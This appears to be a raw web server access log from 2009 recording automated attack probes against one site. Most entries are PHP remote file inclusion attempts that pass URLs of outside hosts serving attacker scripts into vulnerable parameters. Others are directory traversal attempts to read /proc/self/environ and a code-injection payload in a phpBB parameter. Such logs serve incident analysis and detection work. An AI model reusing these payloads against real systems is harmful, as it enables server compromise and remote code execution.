69.175.14.66 - - [28/Jun/2009:21:21:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:21:40 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:21:40 -0700] "GET /logs/access_090406.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:21:45 -0700] "GET /logs/access_090119.log//errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:21:45 -0700] "GET /logs/access_090119.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:21:46 -0700] "GET /logs/access_090119.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:21:46 -0700] "GET /logs/access_090119.log//errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:21:48 -0700] "GET /logs/access.log%20/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.summitcircle.com"
72.30.78.220 - - [28/Jun/2009:21:21:54 -0700] "GET /logs/access_080804.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:05 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:35 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:35 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:35 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:40 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:40 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:40 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:22:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:22:41 -0700] "GET /logs/access_090406.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:22:41 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:43 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:43 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:43 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:44 -0700] "GET /_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:44 -0700] "GET /logs/access.log%20%20//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:22:44 -0700] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:22:44 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:22:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:51 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:51 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:52 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:52 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.246.98.115 - - [28/Jun/2009:21:22:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:23:57 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:23:57 -0700] "GET /logs/access_090406.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:23:57 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:24:22 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:24:22 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:24:22 -0700] "GET /logs/access_090202.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:24:25 -0700] "GET /convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:24:25 -0700] "GET /logs/access_090413.log/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:24:25 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:24:25 -0700] "GET /logs/access_090406.log/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:24:29 -0700] "GET /logs/access_090209.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:24:49 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:24:49 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:24:50 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:24:53 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:24:53 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:24:53 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:06 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:06 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:06 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:25:08 -0700] "GET /logs/access_090202.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:25:08 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:25:08 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:25:15 -0700] "GET /logs/access_090209.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:25:16 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:25:18 -0700] "GET /logs/access_090202.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:25:32 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:25:32 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 781 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:32 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:32 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:25:32 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 5808 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:33 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:38 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:38 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:38 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:21:25:39 -0700] "GET /logs/access_090413.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:47 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:47 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:47 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:48 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:48 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:25:48 -0700] "GET /logs/access_081201.log%20%20/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:26:04 -0700] "GET /logs//calendar.php?pg=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:26:05 -0700] "GET /calendar.php?pg=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:26:05 -0700] "GET /logs/access_090202.log//calendar.php?pg=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:26:12 -0700] "GET /logs/access_090222.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:21:26:55 -0700] "GET /logs/access_090202.log%20%20//calendar.php?pg=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:27:41 -0700] "GET /logs/access_090202.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:27:42 -0700] "GET /logs/access_090413.log/convert/mvcw.php?vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:44 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:44 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:44 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:27:45 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:27:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:27:50 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:27:50 -0700] "GET /logs/access_090406.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:28:18 -0700] "GET /logs/access_090406.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:28:19 -0700] "GET /logs/access_090119.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
72.82.228.83 - - [28/Jun/2009:21:28:21 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:28:57 -0700] "GET /logs/access_090406.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:28:57 -0700] "GET /logs/access_090119.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:29:04 -0700] "GET /logs/access_090119.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:21:29:16 -0700] "GET /logs/access.log%20/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:30:08 -0700] "GET /logs/access_090119.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:30:22 -0700] "GET /logs/access_090119.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:30:37 -0700] "GET /logs/access_090119.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:30:45 -0700] "GET /logs/access_090119.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:30:47 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:31:02 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:31:12 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:31:16 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:31:23 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:21:31:40 -0700] "GET /logs/access_090413.log/convert/mvcw.php?step=1&vwar_root=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
